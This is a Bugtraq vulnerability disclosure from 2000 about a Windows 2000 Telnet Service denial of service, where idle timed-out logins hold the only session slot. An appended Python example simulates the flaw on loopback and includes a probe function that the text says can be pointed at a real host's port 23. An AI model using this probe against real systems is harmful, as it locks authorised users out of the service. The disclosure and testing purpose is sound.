[17857] in bugtraq
Windows 2000 Telnet Service DoS
daemon@ATHENA.MIT.EDU (Alexander Ivanchev)
Thu Nov 30 15:36:08 2000
Message-Id: <HMECJFFOAFOAGOPBEHPPAEHOCAAA.ai@bulinfo.net>
Date: Thu, 30 Nov 2000 00:02:23 +0100
Reply-To: Alexander Ivanchev <ai@BULINFO.NET>
From: Alexander Ivanchev <ai@BULINFO.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Below is the original message sent to Microsoft, and since apparently
'Disclosure Procedures' are once again in focus...
11/08/2000 - Issue is reported to Microsoft's Security Response Team
(secure@microsoft.com)
11/10/2000 - Microsoft confirmed receipt
11/21/2000 - Microsoft responded that they reproduced the issue, and were
evaluating code changes
11/30/2000 - Due to the expiration of the 21-day vendor-response period,
the issue is made public
-----Original Message-----
From: Alexander Ivanchev [mailto:ai@bulinfo.net]
Sent: Thursday, November 09, 2000 16:22
To: secure@microsoft.com
Subject: Windows 2000 Telnet Service DoS
Hello.
I'd like to report the following issue with Windows 2000's Telnet Service
Daemon:
1. System Environment:
Windows 2000 Professional Final Build [Version 5.00.2195]
Service Pack 1, All latest windowsupdate.com security updates (as of
11/08/2000)
Telnet Service Build 5.00.99201.1
2. Classification
Denial of Service, possible code problems
3. Details
a. DoS - The Telnet Service in question is vulnerable to a simple Denial
of Service attack. The problem apparently lies within the login routine of
the daemon. The problem can be demonstrated by telnetting to a machine
running the specified version of the Telnet Service and waiting at the
login/password prompt until a session timeout takes place. However, after
it does time out, the connection is not reset by the daemon until the user
presses a key. In Windows 2000 Professional, due to the fact that it allows
only one telnet connection per host, this will effectively disable access
for the authorized user. We did not test the problem with Server/Advanced
Server/Datacenter, but I believe that establishing the maximum number of
allowed connections and not terminating them would result in the same
problem. Thus, this constitutes a Denial of Service attack. Theoretically,
it is also quite possible to exhaust server-side sockets if there is no
limit imposed on the maximum number of telnet sessions.
b. Possible code problem - On the Windows 2000 Professional test machine
on which the above vulnerability was tested, the following strange behavior
of the telnet service was observed:
By establishing a telnet session and not terminating it, attempts to
establish a different telnet session during the wait interval fail with
the following message:
Microsoft Windows Workstation allows only 1 Telnet Client License
Server has closed connection
Connection to host lost.
However, when a connection is attempted AFTER the session has timed out,
but it is still not reset, SOMETIMES the following return message would
result:
~r?q?LL>ECHELON?ECHELON?ECHELON?echelon?echelon
Microsoft Windows Workstation allows only 1 Telnet Client License
Server has closed connection
Connection to host lost.
Where ECHELON is the hostname of the machine.
Needless to say, this does not seem right.
c. Note: When a machine comes under the above-described attack, the 'List
the current users' telnet admin option will NOT report established
connections, since a login would not have taken place, even though the
number of allowed connections could have been reached. (This, of course,
could easily be discovered using netstat or an equivalent utility.)
4. Credits
The above problems were discovered and tested by Alexander Ivanchev of
Breach Technologies.
Alexander Ivanchev can be reached at ai@bulinfo.net or pr@breachtec.org
5. Disclosure Policy
Breach Technologies will wait for 21 days from the time the message is
sent before disclosing details about the above matter. If an official
advisory/patch is released before this period ends, disclosure will
take place earlier.
6. Feedback Policy
Please feel free to contact us with questions, corrections and comments
regarding these issues.
Thank you for your time and attention!
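The following is an added example and is not part of the advisory above nor code from Microsoft or Breach Technologies. It reproduces, against a local loopback stand-in, the test procedure the advisory describes in section 3a: hold one session idle at the login prompt past the login timeout, then try to open a second one. `SimulatedTelnetd` is a constructed server that mimics the reported behaviour (one session slot, and a timed-out session that is only reset when the client sends a byte); its `reset_on_timeout=True` mode shows the behaviour a corrected daemon would have. `probe_idle_login` is the part you would point at a real host on port 23; the real service's timeout value is not stated in the advisory, so it is a parameter here. All names and the timeout values are assumptions made for this example.

```python
import socket
import threading
import time

# Text quoted in the advisory; used here only to recognise a refused session.
LICENSE_MSG = b"Microsoft Windows Workstation allows only 1 Telnet Client License"


class SimulatedTelnetd(threading.Thread):
    """Constructed stand-in for the reported behaviour, NOT Microsoft's code.
    One session slot (the Professional limit quoted in the report). With
    reset_on_timeout=False the login timeout fires but socket and slot are
    kept until the client sends a byte (the flaw described); with
    reset_on_timeout=True the session is dropped as soon as it times out."""

    def __init__(self, login_timeout=0.3, max_sessions=1, reset_on_timeout=False):
        super().__init__(daemon=True)
        self.login_timeout = login_timeout
        self.max_sessions = max_sessions
        self.reset_on_timeout = reset_on_timeout
        self.active = 0
        self.lock = threading.Lock()
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind(("127.0.0.1", 0))  # loopback only, ephemeral port
        self.listener.listen(5)
        self.port = self.listener.getsockname()[1]

    def run(self):
        while True:
            try:
                conn, _ = self.listener.accept()
            except OSError:  # listener closed by close()
                return
            threading.Thread(target=self._session, args=(conn,), daemon=True).start()

    def _session(self, conn):
        with self.lock:
            if self.active >= self.max_sessions:
                conn.sendall(LICENSE_MSG + b"\r\nServer has closed connection\r\n")
                conn.close()
                return
            self.active += 1
        try:
            conn.sendall(b"login: ")
            conn.settimeout(self.login_timeout)
            try:
                conn.recv(1)  # wait for the user to type something
            except socket.timeout:
                if not self.reset_on_timeout:
                    # The flaw: timed out, yet wait for a keypress before resetting.
                    conn.settimeout(None)
                    conn.recv(1)
        except OSError:
            pass
        finally:
            with self.lock:
                self.active -= 1  # free the slot before the client can see the close
            conn.close()

    def close(self):
        self.listener.close()


def probe_idle_login(host, port, login_timeout, grace=1.0):
    """Hold one session idle at the login prompt past login_timeout, then open
    a second. Reports whether the server reset the idle session by itself and
    whether the second attempt was refused with the licence message."""
    first = socket.create_connection((host, port), timeout=5)
    first.settimeout(0.2)
    first_reset = False
    deadline = time.monotonic() + login_timeout + grace
    while time.monotonic() < deadline:
        try:
            data = first.recv(4096)
        except socket.timeout:
            continue  # still open and silent: keep holding the slot
        except ConnectionError:
            first_reset = True
            break
        if not data:
            first_reset = True  # server closed it: the correct behaviour
            break
    second = socket.create_connection((host, port), timeout=5)
    second.settimeout(2.0)
    reply = b""
    try:
        while True:
            chunk = second.recv(4096)
            if not chunk:
                break
            reply += chunk
    except socket.timeout:
        pass
    second.close()
    first.close()  # the "keypress"/close that finally frees the slot
    return {"idle_session_reset": first_reset,
            "second_session_refused": LICENSE_MSG in reply,
            "second_reply": reply}


def run_simulation(reset_on_timeout):
    """Start the simulated service, probe it, stop it; returns the probe result."""
    srv = SimulatedTelnetd(login_timeout=0.3, reset_on_timeout=reset_on_timeout)
    srv.start()
    try:
        return probe_idle_login("127.0.0.1", srv.port, srv.login_timeout)
    finally:
        srv.close()


if __name__ == "__main__":
    print("faulty   :", run_simulation(reset_on_timeout=False))
    print("corrected:", run_simulation(reset_on_timeout=True))
```

Against the faulty stand-in the probe reports that the idle session was never reset and that the second session was refused with the licence message, which is exactly the lockout the advisory describes; against the corrected stand-in the idle session is dropped at the timeout and the second session gets a login prompt. Against a real host, keep `login_timeout` generous and remember that, as note c says, the service's own user listing will not show the held session, so verify with netstat on the target.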